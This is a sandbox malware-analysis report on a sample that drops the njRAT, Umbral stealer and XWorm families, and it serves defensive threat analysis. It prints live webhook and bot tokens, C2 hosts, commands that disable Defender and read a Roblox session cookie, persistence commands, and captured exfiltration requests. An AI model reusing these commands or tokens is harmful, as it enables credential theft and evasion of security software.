njrat | c1032817c3b6733dccbfe475c4ab3313981410387f518ae06cbbfcf7a51674c6

Analysis

max time kernel
600s
max time network
598s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
27/04/2024, 15:25 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Result.exe
Size

422KB
MD5

d4a25a5c3c21cb009ce03b1679f792f1
SHA1

58c1759d4f82240d90cc9c5fb4a9f2f6d7dbc6a4
SHA256

c1032817c3b6733dccbfe475c4ab3313981410387f518ae06cbbfcf7a51674c6
SHA512

4feee7be209d0a7d6f7e005005af8a49f578c12dee9941f743513ac065e5b89e2e3ca3cbea2288d3150ceb0f8b782665429a7dcc046be93bcd109deaddb24d95
SSDEEP

12288:YoZRL+EP8DDUgoOJBiLHaIJtMQIL/57qDYHN:8I8HUgoOJBiLHaIJtMQK7N

Score

10^/10

njrat umbral xworm paxankor evasion rat spyware stealer trojan

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1233119648527159317/Az86qBZQwyED_alc1sGO6UWR18PzIJCJX0PM3XdL1VTOwZPXr0B4Rc6-GqAkKUjg4Jn2

Extracted

Family

xworm

phentermine-partial.gl.at.ply.gg:36969

Attributes

Install_directory
%AppData%
install_file
Client.exe
telegram
https://api.telegram.org/bot7080511499:AAGFFOA3S2vvwmEy85SIMhKHrMsAdBoLR2Y

Extracted

Family

njrat

Version

0.7d

Botnet

Paxankor

hakim32.ddns.net:2000

phentermine-partial.gl.at.ply.gg:36969

Mutex

9e134de821c32c6ed483f39ec83528df

Attributes

reg_key
9e134de821c32c6ed483f39ec83528df
splitter
|'|'|

Signatures

Detect Umbral payload 5 IoCs

resource	yara_rule
behavioral1/files/0x000a00000001aac3-4.dat	family_umbral
behavioral1/memory/1412-10-0x0000000000400000-0x0000000000471000-memory.dmp	family_umbral
behavioral1/files/0x000800000001ac20-17.dat	family_umbral
behavioral1/memory/4580-21-0x000001D56F530000-0x000001D56F570000-memory.dmp	family_umbral
behavioral1/memory/2016-22-0x0000000000400000-0x0000000000457000-memory.dmp	family_umbral

Detect Xworm Payload 5 IoCs

resource	yara_rule
behavioral1/files/0x000a00000001aac3-4.dat	family_xworm
behavioral1/memory/1412-10-0x0000000000400000-0x0000000000471000-memory.dmp	family_xworm
behavioral1/files/0x000700000001ac21-19.dat	family_xworm
behavioral1/memory/2016-22-0x0000000000400000-0x0000000000457000-memory.dmp	family_xworm
behavioral1/memory/4544-23-0x0000000000F70000-0x0000000000F8A000-memory.dmp	family_xworm

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
Disables Task Manager via registry modification
evasion

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral3.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1652	netsh.exe

Drops startup file 6 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Server.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer.exe	Server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer.exe	Server.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Client.lnk	XClient.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Client.lnk	XClient.exe

Executes dropped EXE 14 IoCs

pid	Process
2016	Malinovka Install.exe
3200	Server.exe
4580	Umbral3.exe
4544	XClient.exe
1548	Client.exe
2528	Client.exe
3708	Client.exe
3436	Client.exe
3760	Client.exe
4124	Client.exe
4520	Client.exe
1220	Client.exe
4204	Client.exe
656	Client.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
11	discord.com
12	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	ip-api.com

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\Explorer.exe	Server.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Explorer.exe	Server.exe
File opened for modification	C:\Program Files (x86)\Explorer.exe	Server.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4352	schtasks.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3104	wmic.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4732	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4212	powershell.exe
4212	powershell.exe
4212	powershell.exe
1660	powershell.exe
1660	powershell.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
1660	powershell.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe
3200	Server.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3200	Server.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4544	XClient.exe
Token: SeDebugPrivilege	4580	Umbral3.exe
Token: SeDebugPrivilege	4212	powershell.exe
Token: SeIncreaseQuotaPrivilege	4212	powershell.exe
Token: SeSecurityPrivilege	4212	powershell.exe
Token: SeTakeOwnershipPrivilege	4212	powershell.exe
Token: SeLoadDriverPrivilege	4212	powershell.exe
Token: SeSystemProfilePrivilege	4212	powershell.exe
Token: SeSystemtimePrivilege	4212	powershell.exe
Token: SeProfSingleProcessPrivilege	4212	powershell.exe
Token: SeIncBasePriorityPrivilege	4212	powershell.exe
Token: SeCreatePagefilePrivilege	4212	powershell.exe
Token: SeBackupPrivilege	4212	powershell.exe
Token: SeRestorePrivilege	4212	powershell.exe
Token: SeShutdownPrivilege	4212	powershell.exe
Token: SeDebugPrivilege	4212	powershell.exe
Token: SeSystemEnvironmentPrivilege	4212	powershell.exe
Token: SeRemoteShutdownPrivilege	4212	powershell.exe
Token: SeUndockPrivilege	4212	powershell.exe
Token: SeManageVolumePrivilege	4212	powershell.exe
Token: 33	4212	powershell.exe
Token: 34	4212	powershell.exe
Token: 35	4212	powershell.exe
Token: 36	4212	powershell.exe
Token: SeDebugPrivilege	1660	powershell.exe
Token: SeDebugPrivilege	3200	Server.exe
Token: SeDebugPrivilege	1816	powershell.exe
Token: SeDebugPrivilege	2032	powershell.exe
Token: SeIncreaseQuotaPrivilege	4716	wmic.exe
Token: SeSecurityPrivilege	4716	wmic.exe
Token: SeTakeOwnershipPrivilege	4716	wmic.exe
Token: SeLoadDriverPrivilege	4716	wmic.exe
Token: SeSystemProfilePrivilege	4716	wmic.exe
Token: SeSystemtimePrivilege	4716	wmic.exe
Token: SeProfSingleProcessPrivilege	4716	wmic.exe
Token: SeIncBasePriorityPrivilege	4716	wmic.exe
Token: SeCreatePagefilePrivilege	4716	wmic.exe
Token: SeBackupPrivilege	4716	wmic.exe
Token: SeRestorePrivilege	4716	wmic.exe
Token: SeShutdownPrivilege	4716	wmic.exe
Token: SeDebugPrivilege	4716	wmic.exe
Token: SeSystemEnvironmentPrivilege	4716	wmic.exe
Token: SeRemoteShutdownPrivilege	4716	wmic.exe
Token: SeUndockPrivilege	4716	wmic.exe
Token: SeManageVolumePrivilege	4716	wmic.exe
Token: 33	4716	wmic.exe
Token: 34	4716	wmic.exe
Token: 35	4716	wmic.exe
Token: 36	4716	wmic.exe
Token: SeIncreaseQuotaPrivilege	4716	wmic.exe
Token: SeSecurityPrivilege	4716	wmic.exe
Token: SeTakeOwnershipPrivilege	4716	wmic.exe
Token: SeLoadDriverPrivilege	4716	wmic.exe
Token: SeSystemProfilePrivilege	4716	wmic.exe
Token: SeSystemtimePrivilege	4716	wmic.exe
Token: SeProfSingleProcessPrivilege	4716	wmic.exe
Token: SeIncBasePriorityPrivilege	4716	wmic.exe
Token: SeCreatePagefilePrivilege	4716	wmic.exe
Token: SeBackupPrivilege	4716	wmic.exe
Token: SeRestorePrivilege	4716	wmic.exe
Token: SeShutdownPrivilege	4716	wmic.exe
Token: SeDebugPrivilege	4716	wmic.exe
Token: SeSystemEnvironmentPrivilege	4716	wmic.exe
Token: SeRemoteShutdownPrivilege	4716	wmic.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4544	XClient.exe

Suspicious use of WriteProcessMemory 47 IoCs

description	pid	Process	procid_target
PID 1412 wrote to memory of 2016	1412	Result.exe	73
PID 1412 wrote to memory of 2016	1412	Result.exe	73
PID 1412 wrote to memory of 2016	1412	Result.exe	73
PID 1412 wrote to memory of 3200	1412	Result.exe	74
PID 1412 wrote to memory of 3200	1412	Result.exe	74
PID 1412 wrote to memory of 3200	1412	Result.exe	74
PID 2016 wrote to memory of 4580	2016	Malinovka Install.exe	75
PID 2016 wrote to memory of 4580	2016	Malinovka Install.exe	75
PID 2016 wrote to memory of 4544	2016	Malinovka Install.exe	76
PID 2016 wrote to memory of 4544	2016	Malinovka Install.exe	76
PID 4580 wrote to memory of 4592	4580	Umbral3.exe	77
PID 4580 wrote to memory of 4592	4580	Umbral3.exe	77
PID 4580 wrote to memory of 4212	4580	Umbral3.exe	79
PID 4580 wrote to memory of 4212	4580	Umbral3.exe	79
PID 3200 wrote to memory of 1652	3200	Server.exe	81
PID 3200 wrote to memory of 1652	3200	Server.exe	81
PID 3200 wrote to memory of 1652	3200	Server.exe	81
PID 4580 wrote to memory of 1660	4580	Umbral3.exe	84
PID 4580 wrote to memory of 1660	4580	Umbral3.exe	84
PID 4580 wrote to memory of 1816	4580	Umbral3.exe	86
PID 4580 wrote to memory of 1816	4580	Umbral3.exe	86
PID 4580 wrote to memory of 2032	4580	Umbral3.exe	88
PID 4580 wrote to memory of 2032	4580	Umbral3.exe	88
PID 4580 wrote to memory of 4716	4580	Umbral3.exe	91
PID 4580 wrote to memory of 4716	4580	Umbral3.exe	91
PID 4544 wrote to memory of 1220	4544	XClient.exe	93
PID 4544 wrote to memory of 1220	4544	XClient.exe	93
PID 4580 wrote to memory of 2732	4580	Umbral3.exe	95
PID 4580 wrote to memory of 2732	4580	Umbral3.exe	95
PID 4580 wrote to memory of 2288	4580	Umbral3.exe	97
PID 4580 wrote to memory of 2288	4580	Umbral3.exe	97
PID 4580 wrote to memory of 4248	4580	Umbral3.exe	99
PID 4580 wrote to memory of 4248	4580	Umbral3.exe	99
PID 4580 wrote to memory of 3104	4580	Umbral3.exe	101
PID 4580 wrote to memory of 3104	4580	Umbral3.exe	101
PID 4544 wrote to memory of 420	4544	XClient.exe	103
PID 4544 wrote to memory of 420	4544	XClient.exe	103
PID 4544 wrote to memory of 4400	4544	XClient.exe	105
PID 4544 wrote to memory of 4400	4544	XClient.exe	105
PID 4580 wrote to memory of 4648	4580	Umbral3.exe	107
PID 4580 wrote to memory of 4648	4580	Umbral3.exe	107
PID 4648 wrote to memory of 4732	4648	cmd.exe	109
PID 4648 wrote to memory of 4732	4648	cmd.exe	109
PID 4544 wrote to memory of 4512	4544	XClient.exe	110
PID 4544 wrote to memory of 4512	4544	XClient.exe	110
PID 4544 wrote to memory of 4352	4544	XClient.exe	112
PID 4544 wrote to memory of 4352	4544	XClient.exe	112

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4592	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Result.exe
"C:\Users\Admin\AppData\Local\Temp\Result.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1412
- C:\Users\Admin\AppData\Local\Temp\Malinovka Install.exe
  "C:\Users\Admin\AppData\Local\Temp\Malinovka Install.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2016
- - C:\Users\Admin\AppData\Local\Temp\Umbral3.exe
    "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4580
  - - C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe"
      4⤵
      Views/modifies file attributes
      PID:4592
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral3.exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4212
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1660
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1816
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2032
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4716
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      4⤵
      PID:2732
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      PID:2288
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      PID:4248
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3104
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe" && pause
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4648
    - - C:\Windows\system32\PING.EXE
        
        ping localhost
        5⤵
        Runs ping.exe
        
        PID:4732
- - C:\Users\Admin\AppData\Local\Temp\XClient.exe
    "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:4544
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'
      4⤵
      PID:1220
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
      4⤵
      PID:420
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Client.exe'
      4⤵
      PID:4400
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Client.exe'
      4⤵
      PID:4512
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Client" /tr "C:\Users\Admin\AppData\Roaming\Client.exe"
      4⤵
      Creates scheduled task(s)
      PID:4352
- C:\Users\Admin\AppData\Local\Temp\Server.exe
  "C:\Users\Admin\AppData\Local\Temp\Server.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3200
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Server.exe" "Server.exe" ENABLE
    3⤵
    - Modifies Windows Firewall
    PID:1652

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
PID:4600

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
PID:2288

C:\Users\Admin\AppData\Roaming\Client.exe
C:\Users\Admin\AppData\Roaming\Client.exe
1⤵
- Executes dropped EXE
PID:1548

C:\Users\Admin\AppData\Roaming\Client.exe
C:\Users\Admin\AppData\Roaming\Client.exe
1⤵
- Executes dropped EXE
PID:2528

C:\Users\Admin\AppData\Roaming\Client.exe
C:\Users\Admin\AppData\Roaming\Client.exe
1⤵
- Executes dropped EXE
PID:3708

C:\Users\Admin\AppData\Roaming\Client.exe
C:\Users\Admin\AppData\Roaming\Client.exe
1⤵
- Executes dropped EXE
PID:3436

C:\Users\Admin\AppData\Roaming\Client.exe
C:\Users\Admin\AppData\Roaming\Client.exe
1⤵
- Executes dropped EXE
PID:3760

C:\Users\Admin\AppData\Roaming\Client.exe
C:\Users\Admin\AppData\Roaming\Client.exe
1⤵
- Executes dropped EXE
PID:4124

C:\Users\Admin\AppData\Roaming\Client.exe
C:\Users\Admin\AppData\Roaming\Client.exe
1⤵
- Executes dropped EXE
PID:4520

C:\Users\Admin\AppData\Roaming\Client.exe
C:\Users\Admin\AppData\Roaming\Client.exe
1⤵
- Executes dropped EXE
PID:1220

C:\Users\Admin\AppData\Roaming\Client.exe
C:\Users\Admin\AppData\Roaming\Client.exe
1⤵
- Executes dropped EXE
PID:4204

C:\Users\Admin\AppData\Roaming\Client.exe
C:\Users\Admin\AppData\Roaming\Client.exe
1⤵
- Executes dropped EXE
PID:656

Network

DNS

gstatic.com

Umbral3.exe

Remote address:

8.8.8.8:53

Request

gstatic.com

IN A

Response

gstatic.com

IN A

216.58.201.99
GET

https://gstatic.com/generate_204

Umbral3.exe

Remote address:

216.58.201.99:443

Request

GET /generate_204 HTTP/1.1
Host: gstatic.com
Connection: Keep-Alive

Response

HTTP/1.1 204 No Content

Content-Length: 0
Cross-Origin-Resource-Policy: cross-origin
Date: Sat, 27 Apr 2024 15:25:17 GMT
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
DNS

99.201.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

99.201.58.216.in-addr.arpa

IN PTR

Response

99.201.58.216.in-addr.arpa

IN PTR

lhr48s48-in-f31e100net

99.201.58.216.in-addr.arpa

IN PTR

prg03s02-in-f99�G

99.201.58.216.in-addr.arpa

IN PTR

prg03s02-in-f3�G
DNS

ip-api.com

XClient.exe

Remote address:

8.8.8.8:53

Request

ip-api.com

IN A

Response

ip-api.com

IN A

208.95.112.1
GET

http://ip-api.com/json/?fields=225545

Umbral3.exe

Remote address:

208.95.112.1:80

Request

GET /json/?fields=225545 HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sat, 27 Apr 2024 15:25:20 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 163
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
GET

http://ip-api.com/line/?fields=hosting

XClient.exe

Remote address:

208.95.112.1:80

Request

GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sat, 27 Apr 2024 15:25:20 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 59
X-Rl: 43
DNS

1.112.95.208.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.112.95.208.in-addr.arpa

IN PTR

Response

1.112.95.208.in-addr.arpa

IN PTR

ip-apicom
DNS

220.167.154.149.in-addr.arpa

Remote address:

8.8.8.8:53

Request

220.167.154.149.in-addr.arpa

IN PTR

Response
DNS

phentermine-partial.gl.at.ply.gg

XClient.exe

Remote address:

8.8.8.8:53

Request

phentermine-partial.gl.at.ply.gg

IN A

Response

phentermine-partial.gl.at.ply.gg

IN A

147.185.221.19
DNS

19.221.185.147.in-addr.arpa

Remote address:

8.8.8.8:53

Request

19.221.185.147.in-addr.arpa

IN PTR

Response
DNS

discord.com

Umbral3.exe

Remote address:

8.8.8.8:53

Request

discord.com

IN A

Response

discord.com

IN A

162.159.135.232

discord.com

IN A

162.159.136.232

discord.com

IN A

162.159.128.233

discord.com

IN A

162.159.138.232

discord.com

IN A

162.159.137.232
POST

https://discord.com/api/webhooks/1233119648527159317/Az86qBZQwyED_alc1sGO6UWR18PzIJCJX0PM3XdL1VTOwZPXr0B4Rc6-GqAkKUjg4Jn2

Umbral3.exe

Remote address:

162.159.135.232:443

Request

POST /api/webhooks/1233119648527159317/Az86qBZQwyED_alc1sGO6UWR18PzIJCJX0PM3XdL1VTOwZPXr0B4Rc6-GqAkKUjg4Jn2 HTTP/1.1
Accept: application/json
User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 968
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 204 No Content

Date: Sat, 27 Apr 2024 15:25:23 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
set-cookie: __dcfduid=5dccff0404aa11efb7266eaf18e0ae75; Expires=Thu, 26-Apr-2029 15:25:23 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1714231524
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EQQBdV0njPe3Y79dzNjKwxcgb4aIya%2BQsPrJnQywRr%2F%2Fg0gDE7y3yZdgN0%2FMgEvm6LVkxDzLmU6BEMU6y1bh5flkxKFRCljhwI0tha0lainAJPeZujPv%2Be%2BhC4DU"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=5dccff0404aa11efb7266eaf18e0ae757382586b146e178c54a3f46496d6417db2f149fc98c509ab3984e13c38453673; Expires=Thu, 26-Apr-2029 15:25:23 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=a80cfeba6f2c5f38ef8233dfcf204441adc31a8f-1714231523; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=dwCWNkVX6qxiCIFcugGKnWGyfxzCKLyOXpRHZZNmTZw-1714231523691-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 87afd32d788c9526-LHR
POST

https://discord.com/api/webhooks/1233119648527159317/Az86qBZQwyED_alc1sGO6UWR18PzIJCJX0PM3XdL1VTOwZPXr0B4Rc6-GqAkKUjg4Jn2

Umbral3.exe

Remote address:

162.159.135.232:443

Request

POST /api/webhooks/1233119648527159317/Az86qBZQwyED_alc1sGO6UWR18PzIJCJX0PM3XdL1VTOwZPXr0B4Rc6-GqAkKUjg4Jn2 HTTP/1.1
Accept: application/json
User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
Content-Type: multipart/form-data; boundary="5a6571d7-7857-440d-9215-c05f10f5da80"
Host: discord.com
Cookie: __dcfduid=5dccff0404aa11efb7266eaf18e0ae75; __sdcfduid=5dccff0404aa11efb7266eaf18e0ae757382586b146e178c54a3f46496d6417db2f149fc98c509ab3984e13c38453673; __cfruid=a80cfeba6f2c5f38ef8233dfcf204441adc31a8f-1714231523; _cfuvid=dwCWNkVX6qxiCIFcugGKnWGyfxzCKLyOXpRHZZNmTZw-1714231523691-0.0.1.1-604800000
Content-Length: 422128
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 27 Apr 2024 15:25:24 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1714231525
x-ratelimit-reset-after: 1
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VjVs58%2F%2F2XhpNxzE3OcNjGjryyJjEFsVBGDjkUqmUeOLLXFk6YeG%2FaBcdfQIfjk%2FkQKfO2eVWADz%2FjoW5UXJh2BuEA1HNbcG75oHTvxwaoU8rV5lkM40mVAvB5C8"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Server: cloudflare
CF-RAY: 87afd32f6b919526-LHR
DNS

232.135.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

232.135.159.162.in-addr.arpa

IN PTR

Response
DNS

api.telegram.org

XClient.exe

Remote address:

8.8.8.8:53

Request

api.telegram.org

IN A

Response

api.telegram.org

IN A

149.154.167.220
GET

https://api.telegram.org/bot7080511499:AAGFFOA3S2vvwmEy85SIMhKHrMsAdBoLR2Y/sendMessage?chat_id=@Xworm234_bot&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AAD3A600F5C1B61F49AAC%0D%0A%0D%0AUserName%20:%20Admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Intel%20Core%20Processor%20(Broadwell)%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%20Error%0D%0AGroub%20:%20XWorm%20V5.2

XClient.exe

Remote address:

149.154.167.220:443

Request

GET /bot7080511499:AAGFFOA3S2vvwmEy85SIMhKHrMsAdBoLR2Y/sendMessage?chat_id=@Xworm234_bot&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AAD3A600F5C1B61F49AAC%0D%0A%0D%0AUserName%20:%20Admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Intel%20Core%20Processor%20(Broadwell)%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%20Error%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive

Response

